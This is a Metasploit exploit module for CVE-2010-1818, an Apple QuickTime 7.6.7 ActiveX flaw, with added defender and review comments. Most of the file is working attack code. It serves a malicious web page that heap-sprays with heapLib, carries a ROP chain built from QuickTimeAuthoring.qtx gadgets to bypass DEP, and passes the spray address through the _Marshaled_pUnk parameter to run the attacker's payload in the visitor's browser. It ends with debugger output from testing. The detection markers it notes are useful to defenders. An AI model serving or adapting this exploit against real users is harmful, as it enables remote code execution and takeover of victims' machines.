##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser-delivered exploit module for CVE-2010-1818 (OSVDB 67705): the Apple
# QuickTime ActiveX control treats the value of the "_Marshaled_pUnk" <object>
# parameter as a trusted COM pointer (see the 'Description' entry below).
#
# Defender notes, based only on what this file serves and declares:
#   * The delivered page instantiates the control by
#     clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B and sets a PARAM named
#     "_Marshaled_pUnk"; both strings are stable markers for content
#     inspection or proxy-log detection of this attack.
#   * 'Targets' lists only QuickTime 7.6.6/7.6.7 on Windows XP SP3. The
#     'Ret' image base and the spray address are build-specific, and the
#     author's own note says QuickTimeAuthoring.qtx 7.6.7 is built with
#     DYNAMIC_BASE, so the 'Description' claim of reliability "on all
#     Windows versions" does not match the target list — presumably
#     ASLR-enabled Windows is mitigated rather than exploited (confirm).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  # Included but nothing in this file calls SEH helpers.
  include Msf::Exploit::Seh

  # BrowserAutopwn registration was left disabled by the author.
  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :os_name => OperatingSystems::Match::WINDOWS,
  #  :ua_name => HttpClients::IE,
  #  :javascript => true,
  #  :rank => NormalRanking, # reliable memory corruption
  #})

  # Registers module metadata with the framework: name, references, payload
  # constraints and the single tested target. Nothing here touches a client.
  #
  # @param info [Hash] framework-supplied module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution',
      'Description'    => %q{
          This module exploits a memory trust issue in Apple QuickTime
        7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX
        control will treat a supplied parameter as a trusted pointer. It will
        then use it as a COM-type pUnknown and lead to arbitrary code execution.

          This exploit utilizes a combination of heap spraying and the
        QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not
        opt-in to ASLR. As such, this module should be reliable on all Windows
        versions.

          NOTE: The addresses may need to be adjusted for older versions of QuickTime.
      },
      'Author'         =>
        [
          'Ruben Santemarta', # original discovery
          'jduck'             # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1818' ],
          [ 'OSVDB', '67705'],
          [ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          # Space limit is the author's estimate ("perhaps more?"); the
          # JavaScript below pads the sprayed block to 0x200 bytes.
          'Space'    => 384, # perhaps more?
          'BadChars' => "", # none...
          'DisableNops' => true,
          'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK:
          #
          # QT 7.6.6 + XP SP3 + IE8
          # QT 7.6.7 + XP SP3 + IE6
          #

          # @eromang reports it doesn't work on 7.6.5
          # - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different

          # QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :(

          [ 'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3',
            {
              'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx
              #'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.5
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-08-30',
      'DefaultTarget'  => 0))
  end

  # HTTP handler invoked by the HttpServer mixin for each request to the
  # module's URI. Builds one HTML page (heapLib-based spray script plus two
  # QuickTime <object> elements), sends it to the connecting browser with a
  # fixed text/html content type, then hands the connection to the payload
  # handler. The same page is served regardless of path or headers.
  #
  # @param client [Object] the connected HTTP client passed by the mixin
  # @param request [Object] the incoming request (unused here)
  # @return [void]
  def on_request_uri(client, request)

    # Bail out when the framework cannot produce a payload for this client.
    # NOTE(review): `== nil` is a style issue only; the Ruby idiom is
    # `return unless (p = regenerate_payload(client))`.
    return if ((p = regenerate_payload(client)) == nil)

    print_status("Sending exploit HTML...")

    # NOTE(review): dead local — nothing below reads `shellcode`; the payload
    # reaches the page through `sploit` (p.encoded is appended to it).
    shellcode = Rex::Text.to_unescape(p.encoded)

    # Hard-coded spray landing address; only meaningful for the tested
    # XP SP3 layouts listed in 'Targets'.
    # We will spray to this address, hopefully
    spray_target = 0x15220c20

    # This is where our happy little dll is loaded
    # 677a0000 679ce000 QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx
    # target.ret is the image base chosen in 'Targets'; every gadget below is
    # an offset from it, which is why a rebuilt qtx (see the 7.6.5 note in
    # 'Targets') breaks the chain.
    rop_mod_base = target.ret

    # ROP chain as 32-bit little-endian dwords (packed with 'V*' below).
    # Index 27 is the 0x42424242 placeholder patched after the array is built.
    sploit = [
      spray_target - 8,

      # This first piece of code points the stack pointer to our data!
      # NOTE: eax, ecx, and esi all point to our spray at this point.
      rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret

      # The second one becomes the new program counter after stack flip.
      rop_mod_base + 0x1e27, # pop ecx / ret
      rop_mod_base + 0x170088, # the IAT addr for HeapCreate (becomes ecx)

      # We get the address of HeapCreate from the IAT here.
      rop_mod_base + 0x10244, # mov eax,[ecx] / ret

      # Call HeapCreate to create the k-rad segment
      rop_mod_base + 0x509e, # call eax
      0x01040110, # flOptions (gets & with 0x40005)
      0x01010101, # dwInitialSize
      0x01010101, # dwMaximumSize

      # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base

      # Set ebx to our adjustment
      rop_mod_base + 0x307a, # pop ebx / ret
      0x8000, # becomes ebx

      # Adjust eax
      rop_mod_base + 0xbfb5b, # add eax,ebx / ret

      # Save our buffer pointer off to this address
      rop_mod_base + 0x1e27, # pop ecx / ret
      rop_mod_base + 0x2062d4, # something writable

      # Write eax to the address
      rop_mod_base + 0x8fd6, # mov [ecx], eax / ret

      # Now we must copy our real payload into the buffer

      # First, setup edi
      rop_mod_base + 0x134fd5, # xchg eax,edi / ret

      # Get ESI from EDI (which is now in EAX)
      rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret
      0x41414141, # scratch (becomes ebx)

      # Set ECX from the stack
      rop_mod_base + 0x1e27, # pop ecx / ret
      0x200 / 4, # dwords to copy :)

      # copy it!
      rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret
      0x41414141, # scratch (becomes edi)
      0x41414141, # scratch (becomes esi)

      # Re-load the buffer pointer address
      rop_mod_base + 0x1e27, # pop ecx / ret
      rop_mod_base + 0x2062d4, # something writable

      # And the pointer value itself
      rop_mod_base + 0x10244, # mov eax,[ecx] / ret

      # Set ebx to our adjustment
      rop_mod_base + 0x307a, # pop ebx / ret
      0x42424242, # will be filled after array init

      # Adjust eax
      rop_mod_base + 0xbfb5b, # add eax,ebx / ret

      # Jump!
      rop_mod_base + 0x509e, # call eax

      # eh? Hopefully we didn't reach here.
      0xdeadbeef
    ]
    # Patch the placeholder (index 27, the 0x42424242 entry) with the byte
    # length of the packed chain plus 8. The index is tied to the array layout
    # above: inserting or removing an entry before it silently mispatches.
    sploit[27] = 8 + (sploit.length * 4)
    sploit = sploit.pack('V*')
    sploit << p.encoded
    sploit = Rex::Text.to_unescape(sploit)

    # JavaScript embedded in the served page. Prepare() performs the heap
    # spray through heapLib; start() inserts two QuickTime <object> elements,
    # the second carrying the _Marshaled_pUnk PARAM whose value is the spray
    # address. This heredoc is interpolated, so `#{...}` inside it is Ruby.
    custom_js = <<-EOF
    function Prepare()
    {
      var block = unescape("#{sploit}");
      while(block.length < 0x200)
        block += unescape("%u0000");
      heap = new heapLib.ie(0x20000);
      while(block.length < 0x80000)
        block += block;
      finalspray = block.substring(2, 0x80000 - 0x21);
      for(var i = 0; i < 350; i++)
      {
        heap.alloc(finalspray);
      }
    }

    function start()
    {
      var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>'
        + '</'+ 'object>';
      document.getElementById('stb').innerHTML = obj;
      Prepare();
      var targ = #{spray_target};
      var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'
        + '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>'
        + '</'+ 'object>';
      document.getElementById('xpl').innerHTML = obj;
    }
    EOF

    # heaplib() comes from the HttpServer::HTML mixin; presumably it prepends
    # the heapLib support code that Prepare() references (not shown here).
    hl_js = heaplib(custom_js)

    # Page skeleton: the script runs from the body's onload, writing into the
    # two placeholder divs.
    content = <<-EOF
<html>
<head>
<script language="javascript">
#{hl_js}
</script>
</head>
<body onload="start()">
<div id="stb"></div>
<div id="xpl"></div>
</body>
</html>
EOF

    # Serve the page with a fixed HTML content type.
    send_response(client, content, { 'Content-Type' => "text/html" })

    # Handle the payload
    handler(client)
  end
end


# Debugger output apparently recorded during the author's testing; kept for
# reference only.
=begin
(7fc.a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc
eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
deadbe01 ??              ???
=end